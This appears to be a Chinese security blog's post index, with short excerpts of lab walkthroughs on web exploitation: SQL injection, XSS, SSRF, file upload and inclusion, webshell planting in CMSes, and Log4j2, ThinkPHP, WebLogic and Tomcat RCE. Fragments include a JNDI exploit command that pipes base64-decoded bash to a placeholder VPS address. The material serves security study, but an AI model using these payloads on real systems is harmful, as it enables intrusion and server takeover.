- 博客(35)
- 收藏
- 关注
原创 使用awvs测试站点并输出漏洞报告教程
2.点击【Targets】--》【Add Targets】新建扫描目标,输入目标网址(以pikachu靶场为例),点击【Save】开始扫描。1.访问本机3443端口(安装时自己设定的端口)2.点击【Scans】
2024-09-25 18:11:43
320
原创 常见框架漏洞
在url处输入 http://123.57.211.129:8080/struts2-showcase/${(123+123)}/actionChain1.action 后刷新可以看到中间数字位置相加了。1.访问 http://your-ip:8080/customers/1,然后抓取数据包,使用PATCH请求来修改。添加【目标地址】--》【爆破密钥】--》【爆破利用链及回显】使⽤JavaDeserH2HC进⾏反弹shell。在靶场中生成shell.sh文件。执行shell.sh文件。
2024-09-23 18:01:37
1721
原创 WebLogic系列漏洞
Weblogic的WLS Security组件对外提供了webserver服务,其中使⽤了XMLDecoder来解析⽤户输⼊的 XML数据,在解析过程中出现反序列化漏洞,可导致任意命令执⾏。通过弱⼝令进⼊后台界⾯ , 上传部署war包 , getshell。2.上传war包,jsp⽊⻢压缩成zip,修改后缀为war,上传。访问以下⽬录中的⼀种,有回显如下图可以判断wls-wsat组件存在。2.在当前⻚⾯抓包之后,添加下⾯请求包,反弹shell。1.登录后台后,点击部署,点击安装,点击上传⽂件。
2024-09-22 23:33:13
517
原创 Tomcat系列漏洞复现
当在Tomcat的conf(配置⽬录下)/web.xml配置⽂件中添加readonly设置为false时,将导致该漏洞产 ⽣,(需要允许put请求) , 攻击者可以利⽤PUT⽅法通过精⼼构造的数据包向存在漏洞的服务器⾥⾯上 传jsp⼀句话⽂件,从⽽造成远程命令执⾏,getshell等。Tomcat允许适⽤put⽅法上传任意⽂件类型,但不允许jsp后缀⽂件上传,因此我们需要配合 windows的解析漏洞.例如在文件名后加/2.使用哥斯拉生成后缀为.jsp的木马,生成的木马内容粘贴于数据包中。
2024-09-22 21:08:52
526
原创 aspcms webshell漏洞复现
ASPCMS是由上谷网络开发的全新内核的开源企业建站系统,能够胜任企业多种建站需求,并且支持模版自定义、支持扩展插件等等,能够在短时间内完成企业建站。
2024-09-17 17:34:48
287
原创 dedecms——四种webshell姿势
步骤二:点击【生成】--》【更新主页HTML】--》将主页位置修改为【../index.php】--》点击 【生成静态】--》点击 【更新主页】 再次访问站点首页可发现变化...步骤一:点击 【系统】--》【SQL命令执行工具】 --》【运行SQL命令行】处添加一句话代码--》点击 【确定】步骤一:点击 【模块】--》【广告管理】 --》〔【增加一个新广告】 --》在 【广告内容】处添。步骤二:登陆到后台点击【核心】--》 【文件式管理器】--》 【文件上传】将准备好的一句话代。步骤三:蚁剑连接测试。
2024-09-17 16:58:09
583
原创 sqlgun靶场漏洞挖掘
找了半天,没有找到管理员登录界面,所以找到管理员账号和密码没有用,虽然没有,但是证明了一点,那就是此处可以无限制输入命令,并执行,通过扫描目录发现存在phpinfo文件,访问得知网站绝对路径。于是乎,尝试使用sql注入的方式,上传一句话木马。搜索框输入以下代码,验证是否存在xss漏洞。写入成功,蚁剑连接大脑,cmd代替思考。此处密码为MD5加密,解码内容如下。经过测试,输入框存在SQL注入漏洞。根据设定的地址访问上传的文件。OK了,存在xss漏洞。
2024-09-13 11:22:03
364
原创 RickdiculouslyEasy--CTF-综合靶场
废话不多说,一个靶机,九个flag,开整!!!使用命令如下,来进行主机发现。找到目标靶机扫描端口依次访问。
2024-09-11 16:43:53
417
原创 反序列化漏洞练习2
拿到题目,发现目标是获得flag.php的内容,且sis中admin和passwd等于sis2407时会输出fag的内容。得到序列化的sis,将序列化后的sis以get的方式为sis传参。根据源码编写序列化代码。
2024-09-09 20:05:48
543
原创 反序列化漏洞练习1
根据代码可以看出来sis类只是接收了参数cmd,下边是通过get获得cmd的值,所以可以在序列化过程中直接为cmd赋值。得到序列化的sis,将序列化后的sis以get的方式为cmd传参。为cmd赋值后,直接将整个sis类序列化。根据源码编写序列化代码。
2024-09-09 19:40:54
497
原创 PHP-FPM 远程代码执行漏洞(CVE-2019-11043)复现
切换目录到vulhub/php/CVE-2019-11043下。浏览器进行访问,成功复现,pwd可替换为其他命令。端口为:8080,访问网站,搭建成功。
2024-09-08 20:12:11
310
原创 ThinkPHP5 5-rce远程代码执行漏洞复现
其版本5中,由于框架对控制器名没有进行足够的检测,会导致在没有开启强制路由的情况下可执行任意方法,从而导致远程命令执行漏洞。我们知道了一定存在index.php这个文件,那么我们就对其进行修改为一句话木马的样式。由于存在过滤,需要用到base64加密来使我们的一句话木马上传成功。成功回显出aabb,说明是加入到了index.php里了。开始用蚁剑,URL地址填写我们一句话木马的位置。端口为:8080,访问网站,搭建成功。(1)输出关于 PHP 配置的信息。将一句话写入index.php。
2024-09-08 19:36:27
700
原创 ThinkPHP5 5.0.23-rce远程代码执行漏洞复现
其版本5中,由于框架对控制器名没有进行足够的检测,会导致在没有开启强制路由的情况下可执行任意方法,从而导致远程命令执行漏洞。通过echo命令写入 Webshell 文件,首先将一句话木马进行Base64 编码。判断是否存在漏洞:访问/index.php?s=captcha页面,会出现如下报错。切换目录到vulhub/thinkphp/5.0.23-rce下。使用HackBar 插件发送 POST 请求。端口为:8080,访问网站,搭建成功。访问shell.php,使用蚁剑连接。
2024-09-08 18:53:34
1046
原创 vulhub靶场log4j2漏洞复现
java -jar target/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,[ 经过 base64 编码后的命令 ]}|{base64,-d}|bash" -A [你的 vpsip]开始反弹Shell准备 JNDI-Injection-Exploit 下载地址并构造PayLoad如下...启动!拿取JDK1.8并构造Payload且直接访问..可以看到⽹⻚被重定向到了我们的恶意类⽹址。漏洞编号:CVE-2021-44228。
2024-09-08 18:01:23
389
原创 中间件漏洞
其2.4.0~2.4.29版本中存 在⼀个解析漏洞,在解析PHP时,1.php\x0A将被按照PHP后缀进⾏解析,导致绕过⼀些服务器的安全 策略。在IIS7.0和IIS7.5版本下也存在解析漏洞,在默认Fast-CGI开启状况下,在⼀个⽂件路径/xx.jpg 后⾯加上/xx.php会将 /xx.jpg/xx.php 解析为 php ⽂件。在.jpg后⾯添加两个空格并给上 .php 后缀,在16进制修改中将原本两个空格的 0x20 0x20 修改为如下即 0x20 0x00 进⾏发包。
2024-09-05 20:15:45
1533
原创 Tomato靶机攻略
在多次尝试后,发现/var/log/auth.log中记录了FTP和SSH的登录服务,我们使用root和root123123123123123账户尝试ssh登录,可以看到被写入到了auth.log日志文件中,如果我们换成一句话木马内容,并且写入到此日志文件中,就可以使用系统目前的文件包含漏洞加载此日志文件,加载一句话木马。image函数就是可以包含其他文件,所以此处可能有文件包含漏洞。找到一个index文件和一个antibot_image目录。因为远程文件包含关闭,我们尝试进行本地文件包含。
2024-09-05 09:00:35
349
原创 文件包含PHP伪协议利用方法
path=php://filter/read=convert.base64-encode/resource= ⽂件 .php。⽤途:读取压缩包内的⽂件(绝对路径 / 相对路径)使⽤: file:// ⽂件的绝对路径和⽂件名。⽤途:常⽤于读取本地⽂件 / 源码。⽤途:常⽤于读取⽂件 / 源码。
2024-09-03 20:10:53
266
原创 pikachu文件包含漏洞靶场
找到中间件的日志文件,例如nginx的logs目录下的access.log文件,做这关之前可以先将之前的日志文件和报错文件删除并重启中间件,方便寻找。包含日志的原理其实就是先使用一句话木马访问网址,在日志上留下可执行的php语句的日志信息,然后使当前页面访问日志,达到执行php语句的效果。若是使用GET直接访问,我们输入的特殊字符就会被编码,达不到执行的效果,所以使用bp抓包的方式访问。发现这里的参数是一个php文件,说明可以将这个参数换成我们的脚本。报错说明访问成功了,我们打开日志文件验证一下。
2024-09-03 19:35:02
303
原创 hackme靶机通关攻略
输入任意书名,开始进行sql注入,判断闭合方式,判断列数,判断闭合方式,寻找回显点,回显点如下图所示。访问该目录可以看到刚刚上传的123.php,访问123.php可以找到根路径。在目标靶场为空查询(啥也不输入直接点查询),得到书单信息。联合注入查询users表的所有数据,找到管理员账户和密码。扫描后台文件可以扫描到uploads目录。联合注入查询users表的列名。将密码进行md5解密。
2024-09-03 18:23:15
298
原创 upload-labs-master靶场(1-20)
本关查看源码,发现文件上传后会在临时目录下,检测出不符合规则直接删除,但是上传和删除之间有一点点的间隔,我们可以在这个间隔中搞点事情,例如将上传的.php文件修改成可以写一句话木马的脚本,只要在间隔中打开文件,它就会生成一个木马文件,系统只会判断上传的文件,不会判断生成出的文件。这么看来的话,php是不能上传了,只能上传图片马了,而且需要在图片马没有被重命名之前访问它。上传图片马失败,发现本关会删掉图片内多余的内容,图片马没有用,只能使用反二次渲染的图片。这里还是将前一关的代码插入图片作出图片马。
2024-09-01 17:39:09
1884
原创 vulhub xxe靶机!
解码之后得到一串flag,瞅着像base32的编码,解一下。终于完事了,解出了一串flag.php的路径,接着抓包看看。发现啥也没有,倒是进入了一个新的.php文件。用账号和密码登录xxe/admin.php。又解出了一大段base64的编码,解!找到了xxe目录和admin.php文件。又解出了一段base64的编码,再解!查询xxe.php,base64解码。得到一串base64的编码,尝试解码。访问靶机ip/robot.txt。选中的内容,进行md5解码。新建.php文件,然后打开。
2024-08-29 18:11:22
259
原创 sqli-labs靶场通关攻略——(41-60)
抓包,查库和上一关流程差不多,只是此关采用布尔盲注。查得第一个字符为s,其余字符分别为ecurity。闭合方式为’),具体操作流程和四十四关一样。抓包,使用堆叠注入输入新的用户名(没啥用)判断闭合方式为’)--+5.联合注入,爆数据。布尔盲注,查第四张表。闭合方式为‘)--+
2024-08-28 19:14:57
792
原创 ctfhub Web练习——SSRF(6-10)
尝试在该网址中访问index.php,发现没有报错404,说明该.php文件真实存在。直接输入一句话木马,会报错不能输入特殊字符,所以需要将木马编码为base64。与上一题思路类似,区别是上一题采用fastcgi协议,本题采用redis协议。成功后,如下图所示,需要输入目标网址真实存在的一个.php文件的绝对路径。查询写入的文件是否成功写入,没有报404错误,写入成功。克隆成功后,在Gopherus目录下输入以下执行口令。访问编码后的链接,并访问写入的shell.php。在url后输入,编码后的内容。
2024-08-28 12:13:42
426
原创 ctfhub Web练习——SSRF(1-5)
修改URL编码后的数据包,同POST请求一样,将%0A全部替换成%0D%0A,在请求末尾添加%0D%0A。修改编码后的内容,将%0A全部替换成%0D%0A,在请求的末尾加上%0A%0D。访问题目链接后发现没有提交按钮,需要自己在网页源码进行添加按钮。二次编码后,将gropher请求头编码后的‘:’和‘/’还原。尝试访问,提示不能访问127.0.0.1。输入以下语句访问flag.php文件。结果如下,在8314端口找到flag。将数据包内容进行URL编码,将编码后的内容输入url框中。在浏览器中验证该端口。
2024-08-27 17:42:52
504
原创 xss-labs靶场通关攻略(1-20)
输入后发现没有反应,点击一下输入框获取焦点触发onfocus事件。提示payload长度为4,尝试在url中输入xss攻击指令。查询源码发现符号被实体化,尝试采用onfocus事件绕过。发现过滤符号且双引号闭合,尝试使用onfocus绕过。发现onfocus会被过滤,尝试使用a href标签法。查看源代码发现闭合方式为”>查看源码,尝试闭合后攻击。使用onfocus绕过。输入xss攻击语句测试。输入攻击语句测试一下。输入攻击语句进行测试。
2024-08-25 15:24:50
262
原创 pikachu—xss跨站脚本攻击通关流程
输入一半后发现存在字符数量限制,修改网站代码进行输入。点击“what do you see?确定该xss为输出位置为dom节点。登录后台后输入账户和密码。攻击代码已经写入数据库。(2)输入点击攻击代码。
2024-08-22 18:46:01
206
原创 SQL手工注入漏洞测试(MongoDB数据库)——墨者学院
表有:Authority_confidential、notice、system.indexes。
2024-08-20 22:26:38
382
原创 SQL手工注入漏洞测试(PostgreSQL数据库)——墨者学院
id=1 order by 4 //回显正常。id=1 order by 5 //无回显。id=1 and 1=1 //回显正常。id=1 and 1=2 //无回显。current_database() //当前数据库。current_user //当前⽤户。version() //版本信息。
2024-08-20 22:11:00
432
原创 ACCESS⼿⼯注⼊
id=14 union select 1,username,3,4,5,6,7 from administrator //报错,说明没有。id=14 and exists(select * from administrator) //未报错,说明从该表返回数据,该表存在。id=14 and exists(select * from admin) //报错,说明该表不存在。id=14 and exists(select * from users) //报错,说明该表不存在。正常,说明存在这⼀列。
2024-08-20 20:49:29
360
原创 SQL手工注入漏洞测试(Oracle数据库)——墨者学院
第一张表叫'LOGMNR_SESSION_EVOLVE$'第三种表叫 LOGMNR_GT_TAB_INCLUDES。使用and 1=1和and 1=2进行判断。第二张表叫'LOGMNR_GLOBAL$'无任何返回信息说明找到了全部列: ’查询数据库数据获取账号密码的字段内容。由于密码由MD5加密,所以需要解码。找到目标表'sns_users'点击图中红色方框位置寻找注入点。2为真,3为假,判断出为2列。解码后输入账号和密码进行登录。找到列'USER_PWD'找到列’STATUS‘
2024-08-20 19:58:31
670
原创 AI-WEB-1.0通关攻略
找到下级目录se3reTdir777/uploads/其中有两条提示的路径,分别访问,寻找注入点。访问该文件,验证是否上传成功。判断出闭合方式为:1'#找到info.php文件。
2024-08-19 19:03:47
388
原创 sqli-labs靶场通关攻略——(1-40)
1.在小皮面板中启动WAMP框架2.修改PHP版本为5.4.45。3.打开网站根目录。4.将靶场的文件解压后,全部粘贴在根目录下5.修改网站根目录下的“sql-connections/db-creds.inc”的内容,以记事本打开,输入你的MySQL的密码。6.输入本机回环地址127.0.0.1,点击SQLi-LABS Page-1(Basic Challenges)安装靶场6.安装完成后,如图所示。
2024-08-14 18:31:47
698
原创 ctfhub-web-信息泄露
目录遍历是web中常见的基础操作,我们通常会通过目录的遍历来发现是否存在对我们有用的信息。1.在浏览器输入www.ctfhub.com,进入ctfhub的官网。2.点击 技能树==>Web==>信息泄露==>目录遍历。6.在该网址的目录下依次翻找,直到找到目标flag.9.粘贴到下方的输入框当中,点击“提交flag”。5.点击网址后,点击“点击开始寻找flag”.7.找到目标flag.txt文件,点击该文件。4.等待环境配置好后,点击给出的网址。最后,完成该训练后配置环境会自动销毁。3.点击“开启题目”
2024-08-13 19:19:11
441
1
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人